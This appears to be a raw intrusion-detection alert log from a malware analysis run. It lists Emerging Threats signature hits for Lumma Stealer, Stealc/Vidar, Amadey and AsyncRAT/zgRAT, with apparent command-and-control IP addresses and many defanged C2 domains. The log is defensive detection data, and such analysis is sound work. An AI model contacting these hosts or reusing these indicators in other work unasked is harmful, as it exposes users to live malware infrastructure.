2025-01-26T15:29:26.104565+0100	2028765	3	Unknown Traffic	192.168.2.4	59869	176.113.115.96	443	TCP
2025-01-26T15:29:27.535896+0100	2028765	3	Unknown Traffic	192.168.2.4	59874	176.113.115.96	443	TCP
2025-01-26T15:29:29.247419+0100	2028765	3	Unknown Traffic	192.168.2.4	59878	176.113.115.96	443	TCP
2025-01-26T15:29:30.558618+0100	2028765	3	Unknown Traffic	192.168.2.4	59887	176.113.115.96	443	TCP
2025-01-26T15:29:31.959672+0100	2028765	3	Unknown Traffic	192.168.2.4	59892	176.113.115.96	443	TCP
2025-01-26T15:29:33.427549+0100	2028765	3	Unknown Traffic	192.168.2.4	59897	176.113.115.96	443	TCP
2025-01-26T15:29:34.846869+0100	2028765	3	Unknown Traffic	192.168.2.4	59902	176.113.115.96	443	TCP
2025-01-26T15:29:36.144380+0100	2028765	3	Unknown Traffic	192.168.2.4	59907	176.113.115.96	443	TCP
2025-01-26T15:29:38.003648+0100	2028765	3	Unknown Traffic	192.168.2.4	59911	176.113.115.96	443	TCP
2025-01-26T15:29:39.448611+0100	2028765	3	Unknown Traffic	192.168.2.4	59913	176.113.115.96	443	TCP
2025-01-26T15:29:40.900658+0100	2028765	3	Unknown Traffic	192.168.2.4	59915	176.113.115.96	443	TCP
2025-01-26T15:29:42.389437+0100	2028765	3	Unknown Traffic	192.168.2.4	59918	176.113.115.96	443	TCP
2025-01-26T15:29:43.978749+0100	2028765	3	Unknown Traffic	192.168.2.4	59920	176.113.115.96	443	TCP
2025-01-26T15:29:45.448479+0100	2028765	3	Unknown Traffic	192.168.2.4	59922	176.113.115.96	443	TCP
2025-01-26T15:29:46.914059+0100	2028765	3	Unknown Traffic	192.168.2.4	59925	176.113.115.96	443	TCP
2025-01-26T15:29:48.399188+0100	2028765	3	Unknown Traffic	192.168.2.4	59928	176.113.115.96	443	TCP
2025-01-26T15:29:49.907877+0100	2028765	3	Unknown Traffic	192.168.2.4	59931	176.113.115.96	443	TCP
2025-01-26T15:29:51.338405+0100	2028765	3	Unknown Traffic	192.168.2.4	59933	176.113.115.96	443	TCP
2025-01-26T15:29:53.015338+0100	2028765	3	Unknown Traffic	192.168.2.4	59936	176.113.115.96	443	TCP
2025-01-26T15:29:54.578177+0100	2028765	3	Unknown Traffic	192.168.2.4	59938	176.113.115.96	443	TCP
2025-01-26T15:29:56.516195+0100	2028765	3	Unknown Traffic	192.168.2.4	59941	176.113.115.96	443	TCP
2025-01-26T15:29:57.936064+0100	2028765	3	Unknown Traffic	192.168.2.4	59943	176.113.115.96	443	TCP
2025-01-26T15:29:59.449786+0100	2028765	3	Unknown Traffic	192.168.2.4	59945	176.113.115.96	443	TCP
2025-01-26T15:30:00.980960+0100	2028765	3	Unknown Traffic	192.168.2.4	59948	176.113.115.96	443	TCP
2025-01-26T15:30:02.418598+0100	2028765	3	Unknown Traffic	192.168.2.4	59950	176.113.115.96	443	TCP
2025-01-26T15:30:04.352265+0100	2028765	3	Unknown Traffic	192.168.2.4	59953	176.113.115.96	443	TCP
2025-01-26T15:30:05.909320+0100	2028765	3	Unknown Traffic	192.168.2.4	59954	176.113.115.96	443	TCP
2025-01-26T15:30:07.444454+0100	2028765	3	Unknown Traffic	192.168.2.4	59956	176.113.115.96	443	TCP
2025-01-26T15:30:08.978075+0100	2028765	3	Unknown Traffic	192.168.2.4	59957	176.113.115.96	443	TCP
2025-01-26T15:30:10.521158+0100	2028765	3	Unknown Traffic	192.168.2.4	59959	176.113.115.96	443	TCP
2025-01-26T15:30:12.052170+0100	2028765	3	Unknown Traffic	192.168.2.4	59960	176.113.115.96	443	TCP
2025-01-26T15:30:13.477069+0100	2028765	3	Unknown Traffic	192.168.2.4	59962	176.113.115.96	443	TCP
2025-01-26T15:30:15.026281+0100	2028765	3	Unknown Traffic	192.168.2.4	59963	176.113.115.96	443	TCP
2025-01-26T15:30:16.324657+0100	2028765	3	Unknown Traffic	192.168.2.4	59964	176.113.115.96	443	TCP
2025-01-26T15:30:17.715777+0100	2028765	3	Unknown Traffic	192.168.2.4	59966	176.113.115.96	443	TCP
2025-01-26T15:30:19.040755+0100	2028765	3	Unknown Traffic	192.168.2.4	59967	176.113.115.96	443	TCP
2025-01-26T15:30:20.628241+0100	2028765	3	Unknown Traffic	192.168.2.4	59969	176.113.115.96	443	TCP
2025-01-26T15:30:21.971270+0100	2028765	3	Unknown Traffic	192.168.2.4	59970	176.113.115.96	443	TCP
2025-01-26T15:30:23.560647+0100	2028765	3	Unknown Traffic	192.168.2.4	59971	176.113.115.96	443	TCP
2025-01-26T15:30:24.872846+0100	2028765	3	Unknown Traffic	192.168.2.4	59973	176.113.115.96	443	TCP
2025-01-26T15:30:26.189407+0100	2028765	3	Unknown Traffic	192.168.2.4	59975	176.113.115.96	443	TCP
2025-01-26T15:30:27.592028+0100	2028765	3	Unknown Traffic	192.168.2.4	59976	176.113.115.96	443	TCP
2025-01-26T15:30:28.979337+0100	2028765	3	Unknown Traffic	192.168.2.4	59978	176.113.115.96	443	TCP
2025-01-26T15:30:30.463939+0100	2028765	3	Unknown Traffic	192.168.2.4	59979	176.113.115.96	443	TCP
2025-01-26T15:30:31.770802+0100	2028765	3	Unknown Traffic	192.168.2.4	59982	176.113.115.96	443	TCP
2025-01-26T15:30:33.071062+0100	2028765	3	Unknown Traffic	192.168.2.4	59983	176.113.115.96	443	TCP
2025-01-26T15:30:34.370671+0100	2028765	3	Unknown Traffic	192.168.2.4	59985	176.113.115.96	443	TCP
2025-01-26T15:30:35.704710+0100	2028765	3	Unknown Traffic	192.168.2.4	59986	176.113.115.96	443	TCP
2025-01-26T15:30:37.002682+0100	2028765	3	Unknown Traffic	192.168.2.4	59988	176.113.115.96	443	TCP
2025-01-26T15:30:38.804080+0100	2028765	3	Unknown Traffic	192.168.2.4	59989	176.113.115.96	443	TCP
2025-01-26T15:30:40.266739+0100	2028765	3	Unknown Traffic	192.168.2.4	59991	176.113.115.96	443	TCP
2025-01-26T15:30:41.566477+0100	2028765	3	Unknown Traffic	192.168.2.4	59993	176.113.115.96	443	TCP
2025-01-26T15:30:42.877379+0100	2028765	3	Unknown Traffic	192.168.2.4	59994	176.113.115.96	443	TCP

ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:30:24.340566+0100	2035595	1	Domain Observed Used for C2 Detected	159.100.19.137	7707	192.168.2.4	59972	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:27:31.340298+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49744	104.21.76.27	443	TCP
2025-01-26T15:27:32.314452+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49749	104.21.76.27	443	TCP
2025-01-26T15:28:05.199331+0100	2054653	1	A Network Trojan was detected	192.168.2.4	59823	104.21.29.142	443	TCP
2025-01-26T15:28:07.260405+0100	2054653	1	A Network Trojan was detected	192.168.2.4	59835	104.21.82.94	443	TCP
2025-01-26T15:28:08.610330+0100	2054653	1	A Network Trojan was detected	192.168.2.4	59842	104.21.29.142	443	TCP
2025-01-26T15:28:09.130117+0100	2054653	1	A Network Trojan was detected	192.168.2.4	59848	104.21.82.94	443	TCP
2025-01-26T15:28:12.359434+0100	2054653	1	A Network Trojan was detected	192.168.2.4	59861	104.21.76.27	443	TCP
2025-01-26T15:28:17.047148+0100	2054653	1	A Network Trojan was detected	192.168.2.4	59722	104.21.82.94	443	TCP
2025-01-26T15:28:18.465851+0100	2054653	1	A Network Trojan was detected	192.168.2.4	59738	104.21.82.94	443	TCP
2025-01-26T15:28:44.327328+0100	2054653	1	A Network Trojan was detected	192.168.2.4	59825	104.21.29.142	443	TCP
2025-01-26T15:28:44.374043+0100	2054653	1	A Network Trojan was detected	192.168.2.4	59827	104.21.82.94	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:27:31.340298+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49744	104.21.76.27	443	TCP
2025-01-26T15:28:05.199331+0100	2049836	1	A Network Trojan was detected	192.168.2.4	59823	104.21.29.142	443	TCP
2025-01-26T15:28:07.260405+0100	2049836	1	A Network Trojan was detected	192.168.2.4	59835	104.21.82.94	443	TCP
2025-01-26T15:28:17.047148+0100	2049836	1	A Network Trojan was detected	192.168.2.4	59722	104.21.82.94	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:27:32.314452+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49749	104.21.76.27	443	TCP
2025-01-26T15:28:08.610330+0100	2049812	1	A Network Trojan was detected	192.168.2.4	59842	104.21.29.142	443	TCP
2025-01-26T15:28:09.130117+0100	2049812	1	A Network Trojan was detected	192.168.2.4	59848	104.21.82.94	443	TCP
2025-01-26T15:28:18.465851+0100	2049812	1	A Network Trojan was detected	192.168.2.4	59738	104.21.82.94	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:04.521654+0100	2059424	1	Domain Observed Used for C2 Detected	192.168.2.4	59823	104.21.29.142	443	TCP
2025-01-26T15:28:08.110524+0100	2059424	1	Domain Observed Used for C2 Detected	192.168.2.4	59842	104.21.29.142	443	TCP
2025-01-26T15:28:14.099846+0100	2059424	1	Domain Observed Used for C2 Detected	192.168.2.4	59709	104.21.29.142	443	TCP
2025-01-26T15:28:17.172387+0100	2059424	1	Domain Observed Used for C2 Detected	192.168.2.4	59730	104.21.29.142	443	TCP
2025-01-26T15:28:19.428593+0100	2059424	1	Domain Observed Used for C2 Detected	192.168.2.4	59751	104.21.29.142	443	TCP
2025-01-26T15:28:26.652815+0100	2059424	1	Domain Observed Used for C2 Detected	192.168.2.4	59782	104.21.29.142	443	TCP
2025-01-26T15:28:33.610076+0100	2059424	1	Domain Observed Used for C2 Detected	192.168.2.4	59796	104.21.29.142	443	TCP
2025-01-26T15:28:43.698504+0100	2059424	1	Domain Observed Used for C2 Detected	192.168.2.4	59825	104.21.29.142	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (yuriy-gagarin .com in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:06.832345+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59835	104.21.82.94	443	TCP
2025-01-26T15:28:08.634943+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59848	104.21.82.94	443	TCP
2025-01-26T15:28:14.756516+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59712	104.21.82.94	443	TCP
2025-01-26T15:28:16.292900+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59722	104.21.82.94	443	TCP
2025-01-26T15:28:17.246409+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59731	104.21.82.94	443	TCP
2025-01-26T15:28:17.632107+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59738	104.21.82.94	443	TCP
2025-01-26T15:28:19.397832+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59750	104.21.82.94	443	TCP
2025-01-26T15:28:19.701446+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59753	104.21.82.94	443	TCP
2025-01-26T15:28:23.324322+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59777	104.21.82.94	443	TCP
2025-01-26T15:28:26.655791+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59781	104.21.82.94	443	TCP
2025-01-26T15:28:28.569094+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59784	104.21.82.94	443	TCP
2025-01-26T15:28:35.048302+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59801	104.21.82.94	443	TCP
2025-01-26T15:28:39.350977+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59817	104.21.82.94	443	TCP
2025-01-26T15:28:43.865567+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59827	104.21.82.94	443	TCP
2025-01-26T15:28:56.966643+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59836	104.21.82.94	443	TCP
2025-01-26T15:28:59.923952+0100	2059404	1	Domain Observed Used for C2 Detected	192.168.2.4	59837	104.21.82.94	443	TCP

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:27:21.623938+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49740	185.215.113.43	80	TCP
2025-01-26T15:27:27.078527+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49742	185.215.113.43	80	TCP
2025-01-26T15:27:31.568075+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49748	185.215.113.43	80	TCP
2025-01-26T15:27:42.043892+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49813	185.215.113.43	80	TCP
2025-01-26T15:27:50.838923+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49867	185.215.113.43	80	TCP
2025-01-26T15:28:03.557005+0100	2044696	1	A Network Trojan was detected	192.168.2.4	49926	185.215.113.43	80	TCP
2025-01-26T15:28:09.408489+0100	2044696	1	A Network Trojan was detected	192.168.2.4	59849	185.215.113.43	80	TCP
2025-01-26T15:28:16.812752+0100	2044696	1	A Network Trojan was detected	192.168.2.4	59723	185.215.113.43	80	TCP
2025-01-26T15:28:25.442125+0100	2044696	1	A Network Trojan was detected	192.168.2.4	59765	185.215.113.43	80	TCP
2025-01-26T15:28:35.760606+0100	2044696	1	A Network Trojan was detected	192.168.2.4	59802	185.215.113.43	80	TCP
2025-01-26T15:28:44.503465+0100	2044696	1	A Network Trojan was detected	192.168.2.4	59826	185.215.113.43	80	TCP
2025-01-26T15:29:04.378153+0100	2044696	1	A Network Trojan was detected	192.168.2.4	59838	185.215.113.43	80	TCP
2025-01-26T15:29:12.134933+0100	2044696	1	A Network Trojan was detected	192.168.2.4	59841	185.215.113.43	80	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:13.730218+0100	2058598	1	Domain Observed Used for C2 Detected	192.168.2.4	55804	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (apporholis .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:42.253826+0100	2059035	1	Domain Observed Used for C2 Detected	192.168.2.4	54845	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bloodyswif .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:02.938295+0100	2059189	1	Domain Observed Used for C2 Detected	192.168.2.4	50167	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chipdonkeruz .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:42.411627+0100	2059037	1	Domain Observed Used for C2 Detected	192.168.2.4	58890	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:14.167234+0100	2058606	1	Domain Observed Used for C2 Detected	192.168.2.4	63461	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crowdwarek .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:42.312942+0100	2059039	1	Domain Observed Used for C2 Detected	192.168.2.4	63773	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (femalsabler .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:42.139897+0100	2059041	1	Domain Observed Used for C2 Detected	192.168.2.4	54953	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (finickypwk .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:04.608385+0100	2059191	1	Domain Observed Used for C2 Detected	192.168.2.4	60379	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:13.798644+0100	2058610	1	Domain Observed Used for C2 Detected	192.168.2.4	59816	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (handscreamny .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:42.542091+0100	2059043	1	Domain Observed Used for C2 Detected	192.168.2.4	57574	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:03.888591+0100	2059421	1	Domain Observed Used for C2 Detected	192.168.2.4	63705	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (kickykiduz .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:03.878285+0100	2059199	1	Domain Observed Used for C2 Detected	192.168.2.4	61436	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (leggelatez .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:03.699944+0100	2059201	1	Domain Observed Used for C2 Detected	192.168.2.4	60124	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (miniatureyu .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:03.743005+0100	2059203	1	Domain Observed Used for C2 Detected	192.168.2.4	54906	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:12.982969+0100	2058616	1	Domain Observed Used for C2 Detected	192.168.2.4	63689	1.1.1.1	53	UDP
2025-01-26T15:28:13.723087+0100	2058616	1	Domain Observed Used for C2 Detected	192.168.2.4	59703	1.1.1.1	53	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:14.124687+0100	2058618	1	Domain Observed Used for C2 Detected	192.168.2.4	64147	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:14.143770+0100	2058622	1	Domain Observed Used for C2 Detected	192.168.2.4	50996	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rainy-lamep .bond)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:30:56.320413+0100	2059415	1	Domain Observed Used for C2 Detected	192.168.2.4	58753	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (robinsharez .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:42.655201+0100	2059049	1	Domain Observed Used for C2 Detected	192.168.2.4	61002	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (savorraiykj .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:03.992458+0100	2059207	1	Domain Observed Used for C2 Detected	192.168.2.4	55922	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shoefeatthe .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:04.068884+0100	2059209	1	Domain Observed Used for C2 Detected	192.168.2.4	50191	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soundtappysk .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:41.949303+0100	2059051	1	Domain Observed Used for C2 Detected	192.168.2.4	59157	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tawdrydadysz .icu)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:12.399277+0100	2059053	1	Domain Observed Used for C2 Detected	192.168.2.4	58807	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:13.980292+0100	2058628	1	Domain Observed Used for C2 Detected	192.168.2.4	60427	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:03.993514+0100	2059423	1	Domain Observed Used for C2 Detected	192.168.2.4	55611	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (versersleep .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:42.331885+0100	2059057	1	Domain Observed Used for C2 Detected	192.168.2.4	57235	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (washyceehsu .lat)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:03.037168+0100	2059211	1	Domain Observed Used for C2 Detected	192.168.2.4	58428	1.1.1.1	53	UDP
2025-01-26T15:28:03.625118+0100	2059211	1	Domain Observed Used for C2 Detected	192.168.2.4	59816	1.1.1.1	53	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:13.747342+0100	2058632	1	Domain Observed Used for C2 Detected	192.168.2.4	59446	1.1.1.1	53	UDP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (yuriy-gagarin .com)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:06.304991+0100	2059403	1	Domain Observed Used for C2 Detected	192.168.2.4	58459	1.1.1.1	53	UDP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:23.405474+0100	2044247	1	Malware Command and Control Activity Detected	5.75.209.106	443	192.168.2.4	59771	TCP
2025-01-26T15:29:24.181924+0100	2044247	1	Malware Command and Control Activity Detected	5.75.209.106	443	192.168.2.4	59864	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:24.880622+0100	2051831	1	Malware Command and Control Activity Detected	5.75.209.106	443	192.168.2.4	59779	TCP
2025-01-26T15:29:25.582702+0100	2051831	1	Malware Command and Control Activity Detected	5.75.209.106	443	192.168.2.4	59867	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:24.880044+0100	2049087	1	A Network Trojan was detected	192.168.2.4	59779	5.75.209.106	443	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-26T15:28:26.939133+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59780	5.75.209.106	443	TCP
2025-01-26T15:28:27.807270+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59783	5.75.209.106	443	TCP
2025-01-26T15:28:37.372006+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59808	5.75.209.106	443	TCP
2025-01-26T15:28:38.328058+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59812	5.75.209.106	443	TCP
2025-01-26T15:28:39.005925+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59814	5.75.209.106	443	TCP
2025-01-26T15:28:41.204351+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59821	5.75.209.106	443	TCP
2025-01-26T15:28:43.041495+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59822	5.75.209.106	443	TCP
2025-01-26T15:28:43.292337+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59823	5.75.209.106	443	TCP
2025-01-26T15:28:44.761128+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59828	5.75.209.106	443	TCP
2025-01-26T15:28:45.978721+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59830	5.75.209.106	443	TCP
2025-01-26T15:28:47.535097+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59831	5.75.209.106	443	TCP
2025-01-26T15:28:48.497379+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59832	5.75.209.106	443	TCP
2025-01-26T15:28:50.680770+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59833	5.75.209.106	443	TCP
2025-01-26T15:29:14.616442+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59843	5.75.209.106	443	TCP
2025-01-26T15:29:16.244097+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59846	5.75.209.106	443	TCP
2025-01-26T15:29:18.064204+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59847	5.75.209.106	443	TCP
2025-01-26T15:29:18.651436+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59851	5.75.209.106	443	TCP
2025-01-26T15:29:20.075749+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59854	5.75.209.106	443	TCP
2025-01-26T15:29:24.028536+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59861	5.75.209.106	443	TCP
2025-01-26T15:29:25.164717+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59865	5.75.209.106	443	TCP
2025-01-26T15:29:25.981798+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59868	5.75.209.106	443	TCP
2025-01-26T15:29:26.946974+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59871	5.75.209.106	443	TCP
2025-01-26T15:29:27.120878+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59870	5.75.209.106	443	TCP
2025-01-26T15:29:28.083082+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59872	5.75.209.106	443	TCP
2025-01-26T15:29:28.118140+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59873	5.75.209.106	443	TCP
2025-01-26T15:29:29.279207+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59877	5.75.209.106	443	TCP
2025-01-26T15:29:30.512658+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59886	5.75.209.106	443	TCP
2025-01-26T15:29:32.344259+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59891	5.75.209.106	443	TCP
2025-01-26T15:29:32.977285+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59895	5.75.209.106	443	TCP
2025-01-26T15:29:34.038537+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59899	5.75.209.106	443	TCP
2025-01-26T15:29:36.511945+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59906	5.75.209.106	443	TCP
2025-01-26T15:29:36.738976+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59908	5.75.209.106	443	TCP
2025-01-26T15:29:37.804967+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59910	5.75.209.106	443	TCP
2025-01-26T15:29:39.967033+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59914	5.75.209.106	443	TCP
2025-01-26T15:29:41.871856+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59917	5.75.209.106	443	TCP
2025-01-26T15:29:43.381425+0100	2059331	1	Malware Command and Control Activity Detected	192.168.2.4	59919	5.75.209.106	443	TCP
